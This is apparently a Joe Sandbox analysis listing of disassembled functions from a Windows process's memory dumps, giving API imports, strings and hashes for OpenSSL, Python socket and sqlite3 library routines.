Instruction Fuzzy Hash: 00311DB2609B8586EB609F64E8503ED63A4FB84B88F444439DB4E57BA5DF3CE648C710

Function 00007FF8B8AFB9A0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8B8AFB9BC
RtlCaptureContext.KERNEL32 ref: 00007FF8B8AFB9E9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8B8AFBA03
RtlVirtualUnwind.KERNEL32 ref: 00007FF8B8AFBA44
IsDebuggerPresent.KERNEL32 ref: 00007FF8B8AFBA98
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8B8AFBAB9
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8B8AFBAC4

Memory Dump Source

Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true

Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: b33348705871ee9e7ab283f86c8f5eedcf1a7189bb6ee5345bbe28c9bc61175f
Instruction ID: e0ed5830c4e1feff5c8d63761e06c1b2ac98f863d85728d6bf02be17596c5a47
Opcode Fuzzy Hash: b33348705871ee9e7ab283f86c8f5eedcf1a7189bb6ee5345bbe28c9bc61175f
Instruction Fuzzy Hash: FB317C7260AB818AEB609F64E8413ED3370FB94384F445439DB4D87A98DF3CD24AC719

Function 00007FF8B7E12FF8 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8B7E13014
RtlCaptureContext.KERNEL32 ref: 00007FF8B7E13041
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8B7E1305B
RtlVirtualUnwind.KERNEL32 ref: 00007FF8B7E1309C
IsDebuggerPresent.KERNEL32 ref: 00007FF8B7E130F0
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8B7E13111
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8B7E1311C

Memory Dump Source

Source File: 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B7E10000, based on PE: true

Associated: 00000001.00000002.2485330634.00007FF8B7E10000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E30000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E39000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E3D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485534943.00007FF8B7E40000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485575820.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e10000_Resource.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 95a6715441451f332765c81f1ec3e8738af08fa5e0456622ef6d16990be337b9
Instruction ID: a0bbaeabc499d78c641360f5ef8e1bf7aeffd651ef14c98730a5c8fa9a1b4921
Opcode Fuzzy Hash: 95a6715441451f332765c81f1ec3e8738af08fa5e0456622ef6d16990be337b9
Instruction Fuzzy Hash: A0314D72609B8185EBA0DF64E8413EE7365FB84B88F44443ADB4E47AA8DF3CD649C704

Function 00007FF8A92D1CC1 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 292COMMON

Download Yara Rule

Strings

tls_construct_new_session_ticket, xrefs: 00007FF8A93469ED, 00007FF8A9346A9A, 00007FF8A9346C24, 00007FF8A9346C9D
construct_stateful_ticket, xrefs: 00007FF8A9346D74
resumption, xrefs: 00007FF8A9346ADE
..\s\ssl\statem\statem_srvr.c, xrefs: 00007FF8A93469F9, 00007FF8A9346AA6, 00007FF8A9346BBE, 00007FF8A9346BDE, 00007FF8A9346C30, 00007FF8A9346CA9, 00007FF8A9346D80

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID:
String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
API String ID: 0-1194634662
Opcode ID: 88c8b04c2ab8bcf9e7f70dfe1e121138aee3cd889fd0a6941f62ea240cb270fb
Instruction ID: 9e3b6017e4befeede0524a36f8868dc621f02f565ed366503de6d16410cbe901
Opcode Fuzzy Hash: 88c8b04c2ab8bcf9e7f70dfe1e121138aee3cd889fd0a6941f62ea240cb270fb
Instruction Fuzzy Hash: 78D17E22A0EAC2A5FB509F26D8406E977A0EBC5BC9F495036EE4C8775ADF7CE541C700

Function 00007FF8B7E1A434 Relevance: 7.6, APIs: 5, Instructions: 138encryptionCOMMON

Download Yara Rule

APIs

00007FF8A8ABF9AC.PYTHON311 ref: 00007FF8B7E1A451

Part of subcall function 00007FF8B7E1C0E0: CertOpenStore.CRYPT32 ref: 00007FF8B7E1C10C

GetLastError.KERNEL32 ref: 00007FF8B7E1A482
CertEnumCRLsInStore.CRYPT32 ref: 00007FF8B7E1A50C
CertFreeCRLContext.CRYPT32 ref: 00007FF8B7E1A576
CertCloseStore.CRYPT32 ref: 00007FF8B7E1A5C1

Memory Dump Source

Source File: 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B7E10000, based on PE: true

Associated: 00000001.00000002.2485330634.00007FF8B7E10000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E30000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E39000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E3D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485534943.00007FF8B7E40000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485575820.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e10000_Resource.jbxd

Similarity

API ID: Cert$Store$00007CloseContextEnumErrorFreeLastOpen
String ID:
API String ID: 966150261-0
Opcode ID: a8fa065c201c2264288c3b6bd62196d31cd228452313055002669bf3ef1d3f0f
Instruction ID: d1e6504b45b54c035b7a963d4ec2fa58528b1c69d96d7817c036984b06af4f60
Opcode Fuzzy Hash: a8fa065c201c2264288c3b6bd62196d31cd228452313055002669bf3ef1d3f0f
Instruction Fuzzy Hash: C551ED61E0DB1285FAD5DF79A96613E62A1AF54FE0F184434CB4E06FB0EE3DE4459300

Function 00007FF8A92D1EE7 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 461COMMON

Download Yara Rule

APIs

00007FF8C61208A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8A932C95A

Strings

..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FF8A932C7A3, 00007FF8A932CAE8, 00007FF8A932CB36, 00007FF8A932CC57, 00007FF8A932CD31, 00007FF8A932CD90
tls_parse_ctos_psk, xrefs: 00007FF8A932CADC, 00007FF8A932CB2F, 00007FF8A932CC50, 00007FF8A932CD2A, 00007FF8A932CD89
D:\a\1\s\include\internal/packet.h, xrefs: 00007FF8A932C755, 00007FF8A932C769

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: 00007C61208
String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
API String ID: 3535234312-3130753023
Opcode ID: 2a42b0082f3978e4a625e517d7351a3eb170e7835e453a3fe52c3c890b2c269d
Instruction ID: 7401c00cf95b337987a87be284aa7da7cd48beb98fbf319b99afac4f36e274ba
Opcode Fuzzy Hash: 2a42b0082f3978e4a625e517d7351a3eb170e7835e453a3fe52c3c890b2c269d
Instruction Fuzzy Hash: A512A162A0EEC261F7509F6594446BEB7B1EF91BC4F046032EE4D87A9ADF7CE5418700

Function 00007FF8A92D24EB Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 332COMMON

Download Yara Rule

APIs

00007FF8C61208A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8A932333A

Strings

tls_construct_ctos_psk, xrefs: 00007FF8A93232DB, 00007FF8A93233DB, 00007FF8A9323423, 00007FF8A93234F5, 00007FF8A93236DF, 00007FF8A932371C, 00007FF8A9323752
..\s\ssl\statem\extensions_clnt.c, xrefs: 00007FF8A93232E7, 00007FF8A93233E7, 00007FF8A932342F, 00007FF8A9323501, 00007FF8A93236EB, 00007FF8A9323728, 00007FF8A932375E

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: 00007C61208
String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
API String ID: 3535234312-446233508
Opcode ID: 54244ec30937f2beb53085ca8ed0f4be0d541556569252cb7cdcc3af8c55fd2d
Instruction ID: 3881f91dc36888f0b5ac0332b3bdbf3d23cce3b9fe631f1a687120347af98623
Opcode Fuzzy Hash: 54244ec30937f2beb53085ca8ed0f4be0d541556569252cb7cdcc3af8c55fd2d
Instruction Fuzzy Hash: D5E1A061A0EAC2A2FB549F15A8406BA77A4EF94FC4F441036EE4DC7A8ADF7CE501C700

Function 00007FF8B7E1B6BC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON

Download Yara Rule

APIs

00007FF8A92D1C3A.LIBSSL-3 ref: 00007FF8B7E1B7AF

Strings

Cannot create a client socket with a PROTOCOL_TLS_SERVER context, xrefs: 00007FF8B7E1B749
Cannot create a server socket with a PROTOCOL_TLS_CLIENT context, xrefs: 00007FF8B7E1B702

Memory Dump Source

Source File: 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B7E10000, based on PE: true

Associated: 00000001.00000002.2485330634.00007FF8B7E10000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E30000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E39000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E3D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485534943.00007FF8B7E40000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485575820.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e10000_Resource.jbxd

Similarity

API ID: 00007
String ID: Cannot create a client socket with a PROTOCOL_TLS_SERVER context$Cannot create a server socket with a PROTOCOL_TLS_CLIENT context
API String ID: 3568877910-1683031804
Opcode ID: c89e802ffd63f0afd4719b640548f1c852397171ec8733eca855b3a355ef6578
Instruction ID: 6be0094d4141adcc1f8e9475eadd1c77779bf86b81a7c4a2b5b87103a6b38822
Opcode Fuzzy Hash: c89e802ffd63f0afd4719b640548f1c852397171ec8733eca855b3a355ef6578
Instruction Fuzzy Hash: 37910666A08B5282EAA4DB2AE85653E63B1FF89FD4B144135CB4E47F70DF3CE4859700

Function 00007FF8B7E555FC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

listen.WS2_32 ref: 00007FF8B7E55653

Strings

|i:listen, xrefs: 00007FF8B7E55618

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: listen
String ID: |i:listen
API String ID: 3257165821-1087349693
Opcode ID: 94f1831a5806fe4433cf6173162e986a81cf6beb45ca33f06a9950e1881fdadf
Instruction ID: a89e3cd212a1e0384d76d5efb838089ee5921e3e19de57805dffb73a367d631a
Opcode Fuzzy Hash: 94f1831a5806fe4433cf6173162e986a81cf6beb45ca33f06a9950e1881fdadf
Instruction Fuzzy Hash: 380117A1A18BC686EB548B6AA88416E63B1FF88FC0B044135DB8E53B28DF7CF4458740

Function 00007FF8B7E541C0 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 166COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 00007FF8B7E5422E
FreeAddrInfoW.WS2_32 ref: 00007FF8B7E5425C
FreeAddrInfoW.WS2_32 ref: 00007FF8B7E54299
FreeAddrInfoW.WS2_32 ref: 00007FF8B7E542C3
inet_pton.WS2_32 ref: 00007FF8B7E54311
inet_pton.WS2_32 ref: 00007FF8B7E54356
getaddrinfo.WS2_32 ref: 00007FF8B7E54396
FreeAddrInfoW.WS2_32 ref: 00007FF8B7E543DE

Strings

unsupported address family, xrefs: 00007FF8B7E54262
address family mismatched, xrefs: 00007FF8B7E54415
wildcard resolved to multiple address, xrefs: 00007FF8B7E5429F
unknown address family, xrefs: 00007FF8B7E543F3
<broadcast>, xrefs: 00007FF8B7E542E4
255.255.255.255, xrefs: 00007FF8B7E542D0

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: AddrFreeInfo$getaddrinfoinet_pton
String ID: 255.255.255.255$<broadcast>$address family mismatched$unknown address family$unsupported address family$wildcard resolved to multiple address
API String ID: 3456548859-1715193308
Opcode ID: cdefa8b7dc4e1c9f1d37940d2dd5b1f1bb56c3d4d45ba7a3aa08869bb9be269c
Instruction ID: dced34f9e9af89db97a3a6492640fb0fbfd6ea76dbfe9d3032f9b9ba3a8f1e02
Opcode Fuzzy Hash: cdefa8b7dc4e1c9f1d37940d2dd5b1f1bb56c3d4d45ba7a3aa08869bb9be269c
Instruction Fuzzy Hash: 997169A1A08BCA82E7249F29A44127D23A0BF86FC4F544236DB4D576B1DF3CF986C310

Function 00007FF8B7E56D20 Relevance: 24.7, APIs: 4, Strings: 10, Instructions: 156COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 00007FF8B7E56EA3
htonl.WS2_32 ref: 00007FF8B7E56F05
getnameinfo.WS2_32 ref: 00007FF8B7E56F4D
FreeAddrInfoW.WS2_32 ref: 00007FF8B7E56FDE

Strings

si|II;getnameinfo(): illegal sockaddr argument, xrefs: 00007FF8B7E56DE8
, xrefs: 00007FF8B7E56F33
surrogatepass, xrefs: 00007FF8B7E56F97
getnameinfo(): flowinfo must be 0-1048575., xrefs: 00007FF8B7E56E0A
IPv4 sockaddr must be 2 tuple, xrefs: 00007FF8B7E56F77
(O), xrefs: 00007FF8B7E56E18
socket.getnameinfo, xrefs: 00007FF8B7E56E1F
getnameinfo() argument 1 must be a tuple, xrefs: 00007FF8B7E56D98
sockaddr resolved to multiple addresses, xrefs: 00007FF8B7E56ED4
Oi:getnameinfo, xrefs: 00007FF8B7E56D55

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: AddrFreeInfogetaddrinfogetnameinfohtonl
String ID: $(O)$IPv4 sockaddr must be 2 tuple$Oi:getnameinfo$getnameinfo() argument 1 must be a tuple$getnameinfo(): flowinfo must be 0-1048575.$si|II;getnameinfo(): illegal sockaddr argument$sockaddr resolved to multiple addresses$socket.getnameinfo$surrogatepass
API String ID: 4001298222-243639936
Opcode ID: 2bb962c61dfce5617e55258c7cc8abcaef14dcf88b39c0d8642c96ec42fe4a83
Instruction ID: f77179ac06787ceb80584032a3a8cb141c7ef5376243aa5dc950f52e628f5fdc
Opcode Fuzzy Hash: 2bb962c61dfce5617e55258c7cc8abcaef14dcf88b39c0d8642c96ec42fe4a83
Instruction Fuzzy Hash: 5681F6B2A18B8A86EB108F69E4402AE63A1FF84FD4F540136DB4D57A68DF7CF545CB40

Function 00007FF8A92E5CA0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 101COMMON

Download Yara Rule

APIs

00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A92E5CD6
00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A92E5D07

Strings

..\s\ssl\ssl_ciph.c, xrefs: 00007FF8A92E5DB1
ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384, xrefs: 00007FF8A92E5DEC
SUITEB128, xrefs: 00007FF8A92E5D2B
SUITEB128C2, xrefs: 00007FF8A92E5CFA
check_suiteb_cipher_list, xrefs: 00007FF8A92E5DA5
SUITEB192, xrefs: 00007FF8A92E5D59
ECDHE-ECDSA-AES256-GCM-SHA384, xrefs: 00007FF8A92E5DF3, 00007FF8A92E5E03
ECDHE-ECDSA-AES128-GCM-SHA256, xrefs: 00007FF8A92E5E0F
SUITEB128ONLY, xrefs: 00007FF8A92E5CCA

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: 00007C6126570
String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
API String ID: 800424832-1099454403
Opcode ID: 4fb00667328cc24e5a01ced80a969a7b37fcff98c645767f26b4f54dc518abc7
Instruction ID: c563ee35b0c5614965acc9c9b6318722f8a54a8b21b8a48516029118308d5d9f
Opcode Fuzzy Hash: 4fb00667328cc24e5a01ced80a969a7b37fcff98c645767f26b4f54dc518abc7
Instruction Fuzzy Hash: 1E416135A2EA82AAFB149F14E89077827B1EB487C4F445435EA1DC7698EF6CE550C701

Function 00007FF8B7E53588 Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 167networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00007FF8B7E5384A

Strings

%s(): unknown Bluetooth protocol, xrefs: 00007FF8B7E535E4
%s(): bad family, xrefs: 00007FF8B7E535CB
%s(): port must be 0-65535., xrefs: 00007FF8B7E537CA
O&i;AF_INET address must be a pair (host, port), xrefs: 00007FF8B7E537A5
%s(): AF_INET address must be tuple, not %.500s, xrefs: 00007FF8B7E53782
%s(): wrong format, xrefs: 00007FF8B7E5361C
O&i|II;AF_INET6 address must be a tuple (host, port[, flowinfo[, scopeid]]), xrefs: 00007FF8B7E536BF
%s(): AF_INET6 address must be tuple, not %.500s, xrefs: 00007FF8B7E53675
%s(): flowinfo must be 0-1048575., xrefs: 00007FF8B7E5372E

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: htons
String ID: %s(): AF_INET address must be tuple, not %.500s$%s(): AF_INET6 address must be tuple, not %.500s$%s(): bad family$%s(): flowinfo must be 0-1048575.$%s(): port must be 0-65535.$%s(): unknown Bluetooth protocol$%s(): wrong format$O&i;AF_INET address must be a pair (host, port)$O&i|II;AF_INET6 address must be a tuple (host, port[, flowinfo[, scopeid]])
API String ID: 4207154920-3893595010
Opcode ID: 345e012d61b2e8659524b3f56b858863a74126cd3a1e83b1df232dfea0b2f435
Instruction ID: 390bf657b676581f0f0fa9ab756410937fee2db4646a48f9bd296a4c4ddc4863
Opcode Fuzzy Hash: 345e012d61b2e8659524b3f56b858863a74126cd3a1e83b1df232dfea0b2f435
Instruction Fuzzy Hash: 298101E6E08B8A86EB108F69D8506BD27A0EF49F88F544136DB0D57AA4DF3CF544D740

Function 00007FF8B8AF6DD0 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 121COMMON

Download Yara Rule

APIs

00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6EB3
00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6ECE
00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6EE5
00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6EFD

Strings

delete, xrefs: 00007FF8B8AF6EDB
You can only execute one statement at a time., xrefs: 00007FF8B8AFCF71
the query contains a null character, xrefs: 00007FF8B8AFCFA7
update, xrefs: 00007FF8B8AF6EC4
insert, xrefs: 00007FF8B8AF6EA6
query string is too large, xrefs: 00007FF8B8AFCF97
replace, xrefs: 00007FF8B8AF6EF6

Memory Dump Source

Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true

Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd

Similarity

API ID: 00007C6126
String ID: You can only execute one statement at a time.$delete$insert$query string is too large$replace$the query contains a null character$update
API String ID: 1558781965-1845899854
